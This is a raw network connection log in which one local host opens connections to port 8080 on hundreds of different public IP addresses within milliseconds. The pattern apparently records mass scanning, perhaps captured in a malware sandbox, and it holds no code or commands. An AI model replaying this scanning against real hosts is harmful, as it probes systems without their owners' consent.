Feb 14, 2024 09:28:45.378472090 CET	6752	8080	192.168.2.15	31.199.246.216
Feb 14, 2024 09:28:45.378472090 CET	6752	8080	192.168.2.15	85.177.150.129
Feb 14, 2024 09:28:45.378473997 CET	6752	8080	192.168.2.15	85.31.240.34
Feb 14, 2024 09:28:45.378480911 CET	6752	8080	192.168.2.15	85.159.116.33
Feb 14, 2024 09:28:45.378495932 CET	6752	8080	192.168.2.15	31.105.26.228
Feb 14, 2024 09:28:45.378499031 CET	6752	8080	192.168.2.15	62.187.142.71
Feb 14, 2024 09:28:45.378499031 CET	6752	8080	192.168.2.15	94.207.45.88
Feb 14, 2024 09:28:45.378499985 CET	6752	8080	192.168.2.15	94.165.159.225
Feb 14, 2024 09:28:45.378499985 CET	6752	8080	192.168.2.15	62.54.93.10
Feb 14, 2024 09:28:45.378499985 CET	6752	8080	192.168.2.15	62.245.12.6
Feb 14, 2024 09:28:45.378515959 CET	6752	8080	192.168.2.15	94.34.166.218
Feb 14, 2024 09:28:45.378515959 CET	6752	8080	192.168.2.15	95.195.127.187
Feb 14, 2024 09:28:45.378523111 CET	6752	8080	192.168.2.15	31.60.174.125
Feb 14, 2024 09:28:45.378523111 CET	6752	8080	192.168.2.15	95.7.193.193
Feb 14, 2024 09:28:45.378523111 CET	6752	8080	192.168.2.15	62.220.127.76
Feb 14, 2024 09:28:45.378524065 CET	6752	8080	192.168.2.15	95.216.179.61
Feb 14, 2024 09:28:45.378540993 CET	6752	8080	192.168.2.15	62.255.9.96
Feb 14, 2024 09:28:45.378540993 CET	6752	8080	192.168.2.15	94.96.149.146
Feb 14, 2024 09:28:45.378540993 CET	6752	8080	192.168.2.15	31.67.80.191
Feb 14, 2024 09:28:45.378540993 CET	6752	8080	192.168.2.15	62.62.244.83
Feb 14, 2024 09:28:45.378561020 CET	6752	8080	192.168.2.15	85.34.251.36
Feb 14, 2024 09:28:45.378573895 CET	6752	8080	192.168.2.15	95.97.30.185
Feb 14, 2024 09:28:45.378583908 CET	6752	8080	192.168.2.15	94.24.212.186
Feb 14, 2024 09:28:45.378587008 CET	6752	8080	192.168.2.15	94.245.125.27
Feb 14, 2024 09:28:45.378587008 CET	6752	8080	192.168.2.15	31.176.224.19
Feb 14, 2024 09:28:45.378587008 CET	6752	8080	192.168.2.15	85.144.182.115
Feb 14, 2024 09:28:45.378587961 CET	6752	8080	192.168.2.15	95.135.82.108
Feb 14, 2024 09:28:45.378587961 CET	6752	8080	192.168.2.15	62.79.239.4
Feb 14, 2024 09:28:45.378607988 CET	6752	8080	192.168.2.15	62.246.2.131
Feb 14, 2024 09:28:45.378607035 CET	6752	8080	192.168.2.15	94.90.134.106
Feb 14, 2024 09:28:45.378607988 CET	6752	8080	192.168.2.15	94.7.107.54
Feb 14, 2024 09:28:45.378607035 CET	6752	8080	192.168.2.15	95.72.124.231
Feb 14, 2024 09:28:45.378628016 CET	6752	8080	192.168.2.15	94.147.9.96
Feb 14, 2024 09:28:45.378631115 CET	6752	8080	192.168.2.15	85.10.13.15
Feb 14, 2024 09:28:45.378632069 CET	6752	8080	192.168.2.15	31.84.122.149
Feb 14, 2024 09:28:45.378639936 CET	6752	8080	192.168.2.15	85.208.58.252
Feb 14, 2024 09:28:45.378649950 CET	6752	8080	192.168.2.15	62.56.183.169
Feb 14, 2024 09:28:45.378668070 CET	6752	8080	192.168.2.15	95.122.135.243
Feb 14, 2024 09:28:45.378669024 CET	6752	8080	192.168.2.15	95.199.0.6
Feb 14, 2024 09:28:45.378691912 CET	6752	8080	192.168.2.15	85.86.74.103
Feb 14, 2024 09:28:45.378691912 CET	6752	8080	192.168.2.15	95.25.254.28
Feb 14, 2024 09:28:45.378696918 CET	6752	8080	192.168.2.15	31.211.255.11
Feb 14, 2024 09:28:45.378696918 CET	6752	8080	192.168.2.15	62.194.204.1
Feb 14, 2024 09:28:45.378698111 CET	6752	8080	192.168.2.15	31.164.65.229
Feb 14, 2024 09:28:45.378696918 CET	6752	8080	192.168.2.15	31.39.151.11
Feb 14, 2024 09:28:45.378705025 CET	6752	8080	192.168.2.15	85.131.27.99
Feb 14, 2024 09:28:45.378720045 CET	6752	8080	192.168.2.15	85.157.145.82
Feb 14, 2024 09:28:45.378720999 CET	6752	8080	192.168.2.15	31.85.146.221
Feb 14, 2024 09:28:45.378720999 CET	6752	8080	192.168.2.15	85.5.213.19
Feb 14, 2024 09:28:45.378725052 CET	6752	8080	192.168.2.15	62.42.227.233
Feb 14, 2024 09:28:45.378739119 CET	6752	8080	192.168.2.15	94.81.121.216
Feb 14, 2024 09:28:45.378739119 CET	6752	8080	192.168.2.15	85.139.110.32
Feb 14, 2024 09:28:45.378739119 CET	6752	8080	192.168.2.15	62.105.108.122
Feb 14, 2024 09:28:45.378739119 CET	6752	8080	192.168.2.15	85.96.69.208
Feb 14, 2024 09:28:45.378746033 CET	6752	8080	192.168.2.15	94.229.140.199
Feb 14, 2024 09:28:45.378763914 CET	6752	8080	192.168.2.15	31.229.154.152
Feb 14, 2024 09:28:45.378763914 CET	6752	8080	192.168.2.15	62.4.138.251
Feb 14, 2024 09:28:45.378779888 CET	6752	8080	192.168.2.15	62.28.37.113
Feb 14, 2024 09:28:45.378784895 CET	6752	8080	192.168.2.15	95.21.77.124
Feb 14, 2024 09:28:45.378787041 CET	6752	8080	192.168.2.15	31.52.0.250
Feb 14, 2024 09:28:45.378787041 CET	6752	8080	192.168.2.15	31.68.78.246
Feb 14, 2024 09:28:45.378798962 CET	6752	8080	192.168.2.15	62.242.23.212
Feb 14, 2024 09:28:45.378807068 CET	6752	8080	192.168.2.15	31.15.55.234
Feb 14, 2024 09:28:45.378818989 CET	6752	8080	192.168.2.15	62.210.246.244
Feb 14, 2024 09:28:45.378819942 CET	6752	8080	192.168.2.15	94.97.46.24
Feb 14, 2024 09:28:45.378825903 CET	6752	8080	192.168.2.15	95.93.102.81
Feb 14, 2024 09:28:45.378827095 CET	6752	8080	192.168.2.15	62.255.15.12
Feb 14, 2024 09:28:45.378828049 CET	6752	8080	192.168.2.15	94.11.133.20
Feb 14, 2024 09:28:45.378834009 CET	6752	8080	192.168.2.15	94.112.183.135
Feb 14, 2024 09:28:45.378838062 CET	6752	8080	192.168.2.15	62.76.159.185
Feb 14, 2024 09:28:45.378843069 CET	6752	8080	192.168.2.15	95.180.129.166
Feb 14, 2024 09:28:45.378853083 CET	6752	8080	192.168.2.15	95.145.247.145
Feb 14, 2024 09:28:45.378856897 CET	6752	8080	192.168.2.15	85.33.241.166
Feb 14, 2024 09:28:45.378856897 CET	6752	8080	192.168.2.15	85.160.197.247
Feb 14, 2024 09:28:45.378858089 CET	6752	8080	192.168.2.15	31.233.111.39
Feb 14, 2024 09:28:45.378856897 CET	6752	8080	192.168.2.15	95.210.253.220
Feb 14, 2024 09:28:45.378864050 CET	6752	8080	192.168.2.15	62.168.166.216
Feb 14, 2024 09:28:45.378865004 CET	6752	8080	192.168.2.15	94.215.73.78
Feb 14, 2024 09:28:45.378865004 CET	6752	8080	192.168.2.15	62.65.179.205
Feb 14, 2024 09:28:45.378870964 CET	6752	8080	192.168.2.15	95.28.222.116
Feb 14, 2024 09:28:45.378875971 CET	6752	8080	192.168.2.15	94.21.160.86
Feb 14, 2024 09:28:45.378885984 CET	6752	8080	192.168.2.15	94.117.169.208
Feb 14, 2024 09:28:45.378897905 CET	6752	8080	192.168.2.15	31.97.234.54
Feb 14, 2024 09:28:45.378904104 CET	6752	8080	192.168.2.15	85.222.178.221
Feb 14, 2024 09:28:45.378911972 CET	6752	8080	192.168.2.15	31.14.2.108
Feb 14, 2024 09:28:45.378917933 CET	6752	8080	192.168.2.15	94.19.185.120
Feb 14, 2024 09:28:45.378918886 CET	6752	8080	192.168.2.15	94.189.53.20
Feb 14, 2024 09:28:45.378920078 CET	6752	8080	192.168.2.15	95.250.142.110
Feb 14, 2024 09:28:45.378920078 CET	6752	8080	192.168.2.15	95.177.66.217
Feb 14, 2024 09:28:45.378936052 CET	6752	8080	192.168.2.15	94.132.24.121
Feb 14, 2024 09:28:45.378937006 CET	6752	8080	192.168.2.15	62.96.137.111
Feb 14, 2024 09:28:45.378936052 CET	6752	8080	192.168.2.15	31.82.162.222
Feb 14, 2024 09:28:45.378937960 CET	6752	8080	192.168.2.15	85.211.127.227
Feb 14, 2024 09:28:45.378938913 CET	6752	8080	192.168.2.15	94.188.88.195
Feb 14, 2024 09:28:45.378950119 CET	6752	8080	192.168.2.15	85.223.33.2
Feb 14, 2024 09:28:45.378952026 CET	6752	8080	192.168.2.15	95.29.17.89
Feb 14, 2024 09:28:45.378952026 CET	6752	8080	192.168.2.15	85.235.182.209
Feb 14, 2024 09:28:45.378952026 CET	6752	8080	192.168.2.15	95.193.38.65
Feb 14, 2024 09:28:45.378953934 CET	6752	8080	192.168.2.15	95.32.136.10
Feb 14, 2024 09:28:45.378953934 CET	6752	8080	192.168.2.15	85.197.127.153
Feb 14, 2024 09:28:45.378953934 CET	6752	8080	192.168.2.15	94.33.17.115
Feb 14, 2024 09:28:45.378957033 CET	6752	8080	192.168.2.15	31.239.149.108
Feb 14, 2024 09:28:45.378957033 CET	6752	8080	192.168.2.15	95.158.206.93
Feb 14, 2024 09:28:45.378967047 CET	6752	8080	192.168.2.15	62.182.130.46
Feb 14, 2024 09:28:45.378968000 CET	6752	8080	192.168.2.15	95.120.162.113
Feb 14, 2024 09:28:45.378968000 CET	6752	8080	192.168.2.15	94.68.34.169
Feb 14, 2024 09:28:45.378976107 CET	6752	8080	192.168.2.15	62.20.100.255
Feb 14, 2024 09:28:45.378976107 CET	6752	8080	192.168.2.15	62.46.153.208
Feb 14, 2024 09:28:45.378979921 CET	6752	8080	192.168.2.15	62.175.115.196
Feb 14, 2024 09:28:45.378984928 CET	6752	8080	192.168.2.15	95.228.234.82
Feb 14, 2024 09:28:45.378989935 CET	6752	8080	192.168.2.15	85.4.4.36
Feb 14, 2024 09:28:45.378995895 CET	6752	8080	192.168.2.15	95.79.59.46
Feb 14, 2024 09:28:45.378995895 CET	6752	8080	192.168.2.15	31.27.25.147
Feb 14, 2024 09:28:45.379010916 CET	6752	8080	192.168.2.15	95.252.99.128
Feb 14, 2024 09:28:45.379018068 CET	6752	8080	192.168.2.15	94.119.89.252
Feb 14, 2024 09:28:45.379018068 CET	6752	8080	192.168.2.15	85.214.74.214
Feb 14, 2024 09:28:45.379018068 CET	6752	8080	192.168.2.15	31.10.203.180
Feb 14, 2024 09:28:45.379020929 CET	6752	8080	192.168.2.15	85.11.196.220
Feb 14, 2024 09:28:45.379020929 CET	6752	8080	192.168.2.15	85.199.7.156
Feb 14, 2024 09:28:45.379023075 CET	6752	8080	192.168.2.15	31.162.29.142
Feb 14, 2024 09:28:45.379025936 CET	6752	8080	192.168.2.15	62.225.135.67
Feb 14, 2024 09:28:45.379044056 CET	6752	8080	192.168.2.15	94.4.109.31
Feb 14, 2024 09:28:45.379044056 CET	6752	8080	192.168.2.15	62.24.102.49
Feb 14, 2024 09:28:45.379048109 CET	6752	8080	192.168.2.15	62.13.64.171
Feb 14, 2024 09:28:45.379054070 CET	6752	8080	192.168.2.15	31.42.180.202
Feb 14, 2024 09:28:45.379054070 CET	6752	8080	192.168.2.15	95.37.9.135
Feb 14, 2024 09:28:45.379054070 CET	6752	8080	192.168.2.15	31.155.178.30
Feb 14, 2024 09:28:45.379067898 CET	6752	8080	192.168.2.15	85.48.91.152
Feb 14, 2024 09:28:45.379066944 CET	6752	8080	192.168.2.15	95.197.204.76
Feb 14, 2024 09:28:45.379067898 CET	6752	8080	192.168.2.15	62.159.76.100
Feb 14, 2024 09:28:45.379066944 CET	6752	8080	192.168.2.15	62.149.119.25
Feb 14, 2024 09:28:45.379081964 CET	6752	8080	192.168.2.15	62.52.155.251
Feb 14, 2024 09:28:45.379082918 CET	6752	8080	192.168.2.15	62.238.96.184
Feb 14, 2024 09:28:45.379086971 CET	6752	8080	192.168.2.15	62.206.101.51
Feb 14, 2024 09:28:45.379090071 CET	6752	8080	192.168.2.15	94.173.29.134
Feb 14, 2024 09:28:45.379091024 CET	6752	8080	192.168.2.15	95.198.206.74
Feb 14, 2024 09:28:45.379103899 CET	6752	8080	192.168.2.15	85.142.72.241
Feb 14, 2024 09:28:45.379105091 CET	6752	8080	192.168.2.15	95.34.147.13
Feb 14, 2024 09:28:45.379115105 CET	6752	8080	192.168.2.15	94.3.245.221
Feb 14, 2024 09:28:45.379120111 CET	6752	8080	192.168.2.15	31.71.167.172
Feb 14, 2024 09:28:45.379121065 CET	6752	8080	192.168.2.15	31.121.184.237
Feb 14, 2024 09:28:45.379122019 CET	6752	8080	192.168.2.15	85.186.126.255
Feb 14, 2024 09:28:45.379122019 CET	6752	8080	192.168.2.15	31.183.13.35
Feb 14, 2024 09:28:45.379134893 CET	6752	8080	192.168.2.15	85.137.83.74
Feb 14, 2024 09:28:45.379149914 CET	6752	8080	192.168.2.15	95.212.210.166
Feb 14, 2024 09:28:45.379149914 CET	6752	8080	192.168.2.15	94.168.176.2
Feb 14, 2024 09:28:45.379153013 CET	6752	8080	192.168.2.15	85.120.76.150
Feb 14, 2024 09:28:45.379154921 CET	6752	8080	192.168.2.15	31.161.192.133
Feb 14, 2024 09:28:45.379165888 CET	6752	8080	192.168.2.15	85.141.162.46
Feb 14, 2024 09:28:45.379170895 CET	6752	8080	192.168.2.15	95.193.171.190
Feb 14, 2024 09:28:45.379172087 CET	6752	8080	192.168.2.15	31.50.159.246
Feb 14, 2024 09:28:45.379179955 CET	6752	8080	192.168.2.15	94.58.97.5
Feb 14, 2024 09:28:45.379179955 CET	6752	8080	192.168.2.15	85.207.98.168
Feb 14, 2024 09:28:45.379188061 CET	6752	8080	192.168.2.15	85.47.242.7
Feb 14, 2024 09:28:45.379188061 CET	6752	8080	192.168.2.15	94.157.94.39
Feb 14, 2024 09:28:45.379189014 CET	6752	8080	192.168.2.15	85.152.172.175
Feb 14, 2024 09:28:45.379188061 CET	6752	8080	192.168.2.15	31.33.18.237
Feb 14, 2024 09:28:45.379190922 CET	6752	8080	192.168.2.15	94.40.122.81
Feb 14, 2024 09:28:45.379188061 CET	6752	8080	192.168.2.15	31.68.20.101
Feb 14, 2024 09:28:45.379199028 CET	6752	8080	192.168.2.15	94.12.73.116
Feb 14, 2024 09:28:45.379199028 CET	6752	8080	192.168.2.15	95.14.134.240
Feb 14, 2024 09:28:45.379204035 CET	6752	8080	192.168.2.15	31.53.8.163
Feb 14, 2024 09:28:45.379204988 CET	6752	8080	192.168.2.15	95.124.73.188
Feb 14, 2024 09:28:45.379204035 CET	6752	8080	192.168.2.15	94.99.181.46
Feb 14, 2024 09:28:45.379204988 CET	6752	8080	192.168.2.15	62.0.141.42
Feb 14, 2024 09:28:45.379208088 CET	6752	8080	192.168.2.15	85.28.109.212
Feb 14, 2024 09:28:45.379208088 CET	6752	8080	192.168.2.15	94.188.206.22
Feb 14, 2024 09:28:45.379214048 CET	6752	8080	192.168.2.15	62.48.136.130
Feb 14, 2024 09:28:45.379214048 CET	6752	8080	192.168.2.15	95.115.255.192
Feb 14, 2024 09:28:45.379220009 CET	6752	8080	192.168.2.15	31.0.245.30
Feb 14, 2024 09:28:45.379224062 CET	6752	8080	192.168.2.15	31.16.33.78
Feb 14, 2024 09:28:45.379230976 CET	6752	8080	192.168.2.15	94.249.200.57
Feb 14, 2024 09:28:45.379234076 CET	6752	8080	192.168.2.15	31.96.133.110
Feb 14, 2024 09:28:45.379235029 CET	6752	8080	192.168.2.15	94.110.36.200
Feb 14, 2024 09:28:45.379235029 CET	6752	8080	192.168.2.15	95.214.106.91
Feb 14, 2024 09:28:45.379236937 CET	6752	8080	192.168.2.15	85.75.201.58
Feb 14, 2024 09:28:45.379240036 CET	6752	8080	192.168.2.15	62.220.174.124
Feb 14, 2024 09:28:45.379242897 CET	6752	8080	192.168.2.15	62.228.22.167
Feb 14, 2024 09:28:45.379246950 CET	6752	8080	192.168.2.15	94.248.112.220
Feb 14, 2024 09:28:45.379259109 CET	6752	8080	192.168.2.15	94.204.81.118
Feb 14, 2024 09:28:45.379264116 CET	6752	8080	192.168.2.15	31.174.30.162
Feb 14, 2024 09:28:45.379264116 CET	6752	8080	192.168.2.15	31.152.128.9
Feb 14, 2024 09:28:45.379265070 CET	6752	8080	192.168.2.15	95.93.192.59
Feb 14, 2024 09:28:45.379277945 CET	6752	8080	192.168.2.15	95.14.59.130
Feb 14, 2024 09:28:45.379281998 CET	6752	8080	192.168.2.15	94.201.152.129
Feb 14, 2024 09:28:45.379300117 CET	6752	8080	192.168.2.15	94.225.90.16
Feb 14, 2024 09:28:45.379307032 CET	6752	8080	192.168.2.15	95.17.28.236
Feb 14, 2024 09:28:45.379307032 CET	6752	8080	192.168.2.15	95.212.200.106
Feb 14, 2024 09:28:45.379311085 CET	6752	8080	192.168.2.15	62.122.161.83
Feb 14, 2024 09:28:45.379318953 CET	6752	8080	192.168.2.15	95.171.191.208
Feb 14, 2024 09:28:45.379319906 CET	6752	8080	192.168.2.15	31.136.107.17
Feb 14, 2024 09:28:45.379319906 CET	6752	8080	192.168.2.15	31.235.86.183
Feb 14, 2024 09:28:45.379324913 CET	6752	8080	192.168.2.15	62.208.85.95
Feb 14, 2024 09:28:45.379327059 CET	6752	8080	192.168.2.15	94.101.150.75
Feb 14, 2024 09:28:45.379327059 CET	6752	8080	192.168.2.15	95.179.168.56
Feb 14, 2024 09:28:45.379339933 CET	6752	8080	192.168.2.15	31.71.15.174
Feb 14, 2024 09:28:45.379353046 CET	6752	8080	192.168.2.15	62.209.55.38
Feb 14, 2024 09:28:45.379357100 CET	6752	8080	192.168.2.15	95.55.254.142
Feb 14, 2024 09:28:45.379358053 CET	6752	8080	192.168.2.15	95.44.41.44
Feb 14, 2024 09:28:45.379369974 CET	6752	8080	192.168.2.15	95.135.246.8
Feb 14, 2024 09:28:45.379370928 CET	6752	8080	192.168.2.15	31.101.81.205
Feb 14, 2024 09:28:45.379386902 CET	6752	8080	192.168.2.15	95.196.59.242
Feb 14, 2024 09:28:45.379404068 CET	6752	8080	192.168.2.15	94.0.16.222
Feb 14, 2024 09:28:45.379404068 CET	6752	8080	192.168.2.15	95.167.7.100
Feb 14, 2024 09:28:45.379405022 CET	6752	8080	192.168.2.15	94.255.150.253
Feb 14, 2024 09:28:45.379417896 CET	6752	8080	192.168.2.15	95.143.69.65
Feb 14, 2024 09:28:45.379429102 CET	6752	8080	192.168.2.15	95.44.61.108
Feb 14, 2024 09:28:45.379429102 CET	6752	8080	192.168.2.15	85.240.157.236
Feb 14, 2024 09:28:45.379429102 CET	6752	8080	192.168.2.15	95.35.247.225
Feb 14, 2024 09:28:45.379432917 CET	6752	8080	192.168.2.15	62.211.75.154
Feb 14, 2024 09:28:45.379432917 CET	6752	8080	192.168.2.15	31.21.52.240
Feb 14, 2024 09:28:45.379432917 CET	6752	8080	192.168.2.15	85.170.50.119
Feb 14, 2024 09:28:45.379443884 CET	6752	8080	192.168.2.15	95.21.109.184
Feb 14, 2024 09:28:45.379462957 CET	6752	8080	192.168.2.15	31.230.227.238
Feb 14, 2024 09:28:45.379462957 CET	6752	8080	192.168.2.15	95.115.51.126
Feb 14, 2024 09:28:45.379465103 CET	6752	8080	192.168.2.15	62.7.59.215
Feb 14, 2024 09:28:45.379465103 CET	6752	8080	192.168.2.15	85.75.30.8
Feb 14, 2024 09:28:45.379477024 CET	6752	8080	192.168.2.15	62.71.192.113
Feb 14, 2024 09:28:45.379492998 CET	6752	8080	192.168.2.15	94.88.195.120
Feb 14, 2024 09:28:45.379499912 CET	6752	8080	192.168.2.15	85.39.207.44
Feb 14, 2024 09:28:45.379499912 CET	6752	8080	192.168.2.15	31.211.133.148
Feb 14, 2024 09:28:45.379502058 CET	6752	8080	192.168.2.15	85.198.241.207
Feb 14, 2024 09:28:45.379501104 CET	6752	8080	192.168.2.15	85.56.188.22
Feb 14, 2024 09:28:45.379504919 CET	6752	8080	192.168.2.15	31.239.167.189
Feb 14, 2024 09:28:45.379504919 CET	6752	8080	192.168.2.15	85.34.217.222
Feb 14, 2024 09:28:45.379507065 CET	6752	8080	192.168.2.15	62.176.254.181
Feb 14, 2024 09:28:45.379506111 CET	6752	8080	192.168.2.15	85.83.92.50
Feb 14, 2024 09:28:45.379506111 CET	6752	8080	192.168.2.15	31.148.93.110
Feb 14, 2024 09:28:45.379507065 CET	6752	8080	192.168.2.15	94.158.211.53
Feb 14, 2024 09:28:45.379513025 CET	6752	8080	192.168.2.15	85.104.122.243
Feb 14, 2024 09:28:45.379507065 CET	6752	8080	192.168.2.15	94.200.159.163
Feb 14, 2024 09:28:45.379507065 CET	6752	8080	192.168.2.15	31.157.83.1
Feb 14, 2024 09:28:45.379520893 CET	6752	8080	192.168.2.15	62.37.244.91
Feb 14, 2024 09:28:45.379537106 CET	6752	8080	192.168.2.15	95.228.182.129
Feb 14, 2024 09:28:45.379547119 CET	6752	8080	192.168.2.15	62.242.95.72
Feb 14, 2024 09:28:45.379550934 CET	6752	8080	192.168.2.15	62.137.202.243
Feb 14, 2024 09:28:45.379551888 CET	6752	8080	192.168.2.15	95.195.190.156
Feb 14, 2024 09:28:45.379555941 CET	6752	8080	192.168.2.15	95.241.178.247
Feb 14, 2024 09:28:45.379555941 CET	6752	8080	192.168.2.15	85.143.25.102
Feb 14, 2024 09:28:45.379561901 CET	6752	8080	192.168.2.15	31.107.248.132
Feb 14, 2024 09:28:45.379576921 CET	6752	8080	192.168.2.15	85.3.136.14
Feb 14, 2024 09:28:45.379589081 CET	6752	8080	192.168.2.15	62.252.177.124
Feb 14, 2024 09:28:45.379590988 CET	6752	8080	192.168.2.15	94.18.223.169
Feb 14, 2024 09:28:45.379591942 CET	6752	8080	192.168.2.15	94.60.218.36
Feb 14, 2024 09:28:45.379591942 CET	6752	8080	192.168.2.15	62.20.180.7
Feb 14, 2024 09:28:45.379600048 CET	6752	8080	192.168.2.15	94.146.20.168
Feb 14, 2024 09:28:45.379615068 CET	6752	8080	192.168.2.15	94.89.13.25
Feb 14, 2024 09:28:45.379618883 CET	6752	8080	192.168.2.15	95.215.5.91
Feb 14, 2024 09:28:45.379627943 CET	6752	8080	192.168.2.15	31.116.219.98
Feb 14, 2024 09:28:45.379628897 CET	6752	8080	192.168.2.15	85.162.125.32
Feb 14, 2024 09:28:45.379628897 CET	6752	8080	192.168.2.15	94.37.61.19
Feb 14, 2024 09:28:45.379628897 CET	6752	8080	192.168.2.15	31.121.75.199
Feb 14, 2024 09:28:45.379636049 CET	6752	8080	192.168.2.15	31.154.223.107
Feb 14, 2024 09:28:45.379637003 CET	6752	8080	192.168.2.15	94.170.143.199
Feb 14, 2024 09:28:45.379637957 CET	6752	8080	192.168.2.15	31.17.252.145
Feb 14, 2024 09:28:45.379640102 CET	6752	8080	192.168.2.15	95.158.42.8
Feb 14, 2024 09:28:45.379643917 CET	6752	8080	192.168.2.15	85.10.226.60
Feb 14, 2024 09:28:45.379645109 CET	6752	8080	192.168.2.15	85.150.135.110
Feb 14, 2024 09:28:45.379647970 CET	6752	8080	192.168.2.15	62.245.68.63
Feb 14, 2024 09:28:45.379650116 CET	6752	8080	192.168.2.15	94.138.214.10
Feb 14, 2024 09:28:45.379650116 CET	6752	8080	192.168.2.15	31.177.252.18
Feb 14, 2024 09:28:45.379671097 CET	6752	8080	192.168.2.15	62.190.10.8
Feb 14, 2024 09:28:45.379673004 CET	6752	8080	192.168.2.15	85.27.142.185
Feb 14, 2024 09:28:45.379686117 CET	6752	8080	192.168.2.15	95.20.121.96
Feb 14, 2024 09:28:45.379688025 CET	6752	8080	192.168.2.15	94.99.6.111
Feb 14, 2024 09:28:45.379693985 CET	6752	8080	192.168.2.15	62.78.22.242
Feb 14, 2024 09:28:45.379698038 CET	6752	8080	192.168.2.15	94.87.144.175
Feb 14, 2024 09:28:45.379700899 CET	6752	8080	192.168.2.15	95.100.245.32
Feb 14, 2024 09:28:45.379710913 CET	6752	8080	192.168.2.15	85.118.78.229
Feb 14, 2024 09:28:45.379719019 CET	6752	8080	192.168.2.15	31.180.190.174
Feb 14, 2024 09:28:45.379719973 CET	6752	8080	192.168.2.15	94.122.130.188
Feb 14, 2024 09:28:45.379719973 CET	6752	8080	192.168.2.15	85.143.100.192
Feb 14, 2024 09:28:45.379724979 CET	6752	8080	192.168.2.15	62.98.45.113
Feb 14, 2024 09:28:45.379728079 CET	6752	8080	192.168.2.15	95.46.71.29
Feb 14, 2024 09:28:45.379740953 CET	6752	8080	192.168.2.15	95.241.164.75
Feb 14, 2024 09:28:45.379740953 CET	6752	8080	192.168.2.15	31.251.75.131
Feb 14, 2024 09:28:45.379745960 CET	6752	8080	192.168.2.15	62.148.85.229
Feb 14, 2024 09:28:45.379781961 CET	6752	8080	192.168.2.15	31.167.95.139
Feb 14, 2024 09:28:45.379782915 CET	6752	8080	192.168.2.15	94.141.248.41
Feb 14, 2024 09:28:45.379782915 CET	6752	8080	192.168.2.15	85.202.9.216
Feb 14, 2024 09:28:45.379784107 CET	6752	8080	192.168.2.15	85.89.189.36
Feb 14, 2024 09:28:45.379784107 CET	6752	8080	192.168.2.15	62.60.60.219
Feb 14, 2024 09:28:45.379790068 CET	6752	8080	192.168.2.15	95.240.64.124
Feb 14, 2024 09:28:45.379797935 CET	6752	8080	192.168.2.15	94.149.195.182
Feb 14, 2024 09:28:45.379805088 CET	6752	8080	192.168.2.15	62.148.31.181
Feb 14, 2024 09:28:45.379805088 CET	6752	8080	192.168.2.15	94.17.181.228
Feb 14, 2024 09:28:45.379813910 CET	6752	8080	192.168.2.15	62.210.10.31
Feb 14, 2024 09:28:45.379822969 CET	6752	8080	192.168.2.15	85.234.154.33
Feb 14, 2024 09:28:45.379822969 CET	6752	8080	192.168.2.15	94.175.13.135
Feb 14, 2024 09:28:45.379822969 CET	6752	8080	192.168.2.15	31.39.161.100
Feb 14, 2024 09:28:45.379822969 CET	6752	8080	192.168.2.15	95.129.97.24
Feb 14, 2024 09:28:45.379822969 CET	6752	8080	192.168.2.15	95.76.4.196
Feb 14, 2024 09:28:45.379822969 CET	6752	8080	192.168.2.15	95.58.110.8
Feb 14, 2024 09:28:45.379822969 CET	6752	8080	192.168.2.15	94.163.162.205
Feb 14, 2024 09:28:45.379822969 CET	6752	8080	192.168.2.15	94.207.157.95
Feb 14, 2024 09:28:45.379822969 CET	6752	8080	192.168.2.15	95.166.50.232
Feb 14, 2024 09:28:45.379823923 CET	6752	8080	192.168.2.15	95.23.95.15
Feb 14, 2024 09:28:45.379829884 CET	6752	8080	192.168.2.15	31.60.22.201
Feb 14, 2024 09:28:45.379832983 CET	6752	8080	192.168.2.15	94.198.132.223
Feb 14, 2024 09:28:45.379832983 CET	6752	8080	192.168.2.15	62.169.89.67
Feb 14, 2024 09:28:45.379836082 CET	6752	8080	192.168.2.15	31.56.188.217
Feb 14, 2024 09:28:45.379849911 CET	6752	8080	192.168.2.15	95.38.86.192
Feb 14, 2024 09:28:45.379854918 CET	6752	8080	192.168.2.15	85.116.63.88
Feb 14, 2024 09:28:45.379861116 CET	6752	8080	192.168.2.15	94.115.126.178
Feb 14, 2024 09:28:45.379861116 CET	6752	8080	192.168.2.15	31.173.197.169
Feb 14, 2024 09:28:45.379865885 CET	6752	8080	192.168.2.15	94.114.178.242
Feb 14, 2024 09:28:45.379865885 CET	6752	8080	192.168.2.15	31.167.227.158
Feb 14, 2024 09:28:45.379865885 CET	6752	8080	192.168.2.15	95.5.236.123
Feb 14, 2024 09:28:45.379865885 CET	6752	8080	192.168.2.15	62.173.182.10
Feb 14, 2024 09:28:45.379870892 CET	6752	8080	192.168.2.15	31.111.159.36
Feb 14, 2024 09:28:45.379870892 CET	6752	8080	192.168.2.15	31.240.105.229
Feb 14, 2024 09:28:45.379874945 CET	6752	8080	192.168.2.15	62.225.38.55
Feb 14, 2024 09:28:45.379874945 CET	6752	8080	192.168.2.15	95.46.28.4
Feb 14, 2024 09:28:45.379880905 CET	6752	8080	192.168.2.15	31.38.156.240
Feb 14, 2024 09:28:45.379893064 CET	6752	8080	192.168.2.15	95.168.144.193
Feb 14, 2024 09:28:45.379894018 CET	6752	8080	192.168.2.15	85.95.16.10
Feb 14, 2024 09:28:45.379894018 CET	6752	8080	192.168.2.15	31.53.23.153
Feb 14, 2024 09:28:45.379897118 CET	6752	8080	192.168.2.15	95.62.23.126
Feb 14, 2024 09:28:45.379897118 CET	6752	8080	192.168.2.15	85.6.94.251
Feb 14, 2024 09:28:45.379910946 CET	6752	8080	192.168.2.15	94.178.220.202
Feb 14, 2024 09:28:45.379910946 CET	6752	8080	192.168.2.15	94.169.120.234
Feb 14, 2024 09:28:45.379921913 CET	6752	8080	192.168.2.15	31.201.181.191
Feb 14, 2024 09:28:45.379924059 CET	6752	8080	192.168.2.15	94.92.173.179
Feb 14, 2024 09:28:45.379930973 CET	6752	8080	192.168.2.15	31.14.47.27
Feb 14, 2024 09:28:45.379935026 CET	6752	8080	192.168.2.15	85.34.127.244
Feb 14, 2024 09:28:45.379937887 CET	6752	8080	192.168.2.15	95.244.79.173
Feb 14, 2024 09:28:45.379951954 CET	6752	8080	192.168.2.15	85.240.201.24
Feb 14, 2024 09:28:45.379951954 CET	6752	8080	192.168.2.15	95.96.86.85
Feb 14, 2024 09:28:45.379966021 CET	6752	8080	192.168.2.15	95.239.62.87
Feb 14, 2024 09:28:45.379967928 CET	6752	8080	192.168.2.15	94.240.55.123
Feb 14, 2024 09:28:45.379971981 CET	6752	8080	192.168.2.15	31.209.197.208
Feb 14, 2024 09:28:45.379972935 CET	6752	8080	192.168.2.15	95.160.146.215
Feb 14, 2024 09:28:45.379971981 CET	6752	8080	192.168.2.15	94.39.170.73
